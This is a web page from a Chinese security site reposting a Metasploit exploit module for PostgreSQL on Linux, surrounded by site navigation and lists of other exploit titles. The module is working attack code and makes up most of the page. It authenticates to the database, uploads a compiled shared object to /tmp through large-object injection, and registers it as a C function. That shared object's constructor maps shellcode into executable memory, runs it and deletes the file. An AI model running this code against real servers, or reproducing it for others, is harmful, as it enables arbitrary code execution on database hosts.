首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PostgreSQL for Linux Payload Execution
来源:http://www.metasploit.com 作者:todb 发布时间:2012-12-14  

###
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/exploit/postgres'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::Postgres
 include Msf::Auxiliary::Report

 # Creates an instance of this module.
 def initialize(info = {})
  super(update_info(info,
   'Name'           => 'PostgreSQL for Linux Payload Execution',
   'Description'    => %q{
    On some default Linux installations of PostgreSQL, the
    postgres service account may write to the /tmp directory, and
    may source UDF Shared Libraries's from there as well, allowing
    execution of arbitrary code.

    This module compiles a Linux shared object file, uploads it to
    the target host via the UPDATE pg_largeobject method of binary
    injection, and creates a UDF (user defined function) from that
    shared object. Because the payload is run as the shared object's
    constructor, it does not need to conform to specific Postgres
    API versions.
   },
   'Author'         =>
   [
    'midnitesnake', # this Metasploit module
    'egypt',        # on-the-fly compiled .so technique
    'todb'          # original windows module this is based on
   ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision$',
   'References'     =>
    [
     [ 'URL', 'http://www.leidecker.info/pgshell/Having_Fun_With_PostgreSQL.txt' ]
    ],
   'Platform'       => 'linux',
   'Payload'        =>
    {
     'Space'    => 65535,
     'DisableNops'  => true,
    },
   'Targets'        =>
    [
     [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
     [ 'Linux x86_64',    { 'Arch' => ARCH_X86_64 } ],
    ],
   'DefaultTarget'  => 0,
   'DisclosureDate' => 'Jun 05 2007'

   ))

  deregister_options('SQL', 'RETURN_ROWSET')
 end

 # Buncha stuff to make typing easier.
 def username; datastore['USERNAME']; end
 def password; datastore['PASSWORD']; end
 def database; datastore['DATABASE']; end
 def rhost; datastore['rhost']; end
 def rport; datastore['rport']; end
 def verbose; datastore['VERBOSE']; end
 def bits; datastore['BITS'];end

 def execute_command(cmd, opts)
  postgres_sys_exec(cmd)
 end

 def exploit
  version = do_login(username,password,database)
  case version
  when :noauth; print_error "Authentication failed."; return
  when :noconn; print_error "Connection failed."; return
  else
   print_status("#{rhost}:#{rport} - #{version}")
  end

  fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so"
  tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname)

  unless tbl && fld && so && oid
   print_error "Could not upload the UDF SO"
   return
  end

  print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
  begin
   func_name = Rex::Text.rand_text_alpha(10)
   postgres_query(
    "create or replace function pg_temp.#{func_name}()"+
    " returns void as '#{so}','#{func_name}'"+
    " language 'C' strict immutable"
   )
  rescue
  end
  postgres_logout if @postgres_conn

 end


 # Authenticate to the postgres server.
 #
 # Returns the version from #postgres_fingerprint
 def do_login(user=nil,pass=nil,database=nil)
  begin
   password = pass || postgres_password
   vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
   result = postgres_fingerprint(
    :db => database,
    :username => user,
    :password => password
   )
   if result[:auth]
    report_service(
     :host => rhost,
     :port => rport,
     :name => "postgres",
     :info => result.values.first
    )
    return result[:auth]
   else
    return :noauth
   end
  rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
   return :noconn
  end
 end


 def payload_so(filename)
  shellcode = Rex::Text.to_hex(payload.encoded, "\\x")
  #shellcode = "\\xcc"

  c = %Q^
   int _exit(int);
   int printf(const char*, ...);
   int perror(const char*);
   void *mmap(int, int, int, int, int, int);
   void *memcpy(void *, const void *, int);
   int mprotect(void *, int, int);
   int fork();
   int unlink(const char *pathname);

   #define MAP_PRIVATE 2
   #define MAP_ANONYMOUS 32
   #define PROT_READ 1
   #define PROT_WRITE 2
   #define PROT_EXEC 4

   #define PAGESIZE 0x1000

   char shellcode[] = "#{shellcode}";

   void run_payload(void) __attribute__((constructor));

   void run_payload(void)
   {
    int (*fp)();
    fp = mmap(0, PAGESIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);

    memcpy(fp, shellcode, sizeof(shellcode));
    if (mprotect(fp, PAGESIZE, PROT_READ|PROT_WRITE|PROT_EXEC)) {
     _exit(1);
    }
    if (!fork()) {
     fp();
    }

    unlink("#{filename}");
    return;
   }

  ^

  cpu = case target_arch.first
   when ARCH_X86; Metasm::Ia32.new
   when ARCH_X86_64; Metasm::X86_64.new
   end
  payload_so = Metasm::ELF.compile_c(cpu, c, "payload.c")

  so_file = payload_so.encode_string(:lib)

  so_file
 end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Cisco Wireless Lan Controller
·VLC Player 2.0.3 (NULL File) L
·Mozilla Firefox HTML/JS DOS Vu
·Uploadify jQuery Generic File
·Novell File Reporter Agent XML
·Crystal Reports CrystalPrintCo
·Microsoft Internet Explorer 6-
·Firefox 17.0.1 Crash Proof Of
·Microsoft windows remote deskt
·Centrify Deployment Manager 2.
·Smartphone Pentest Framework 0
·InduSoft Web Studio ISSymbol.o
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved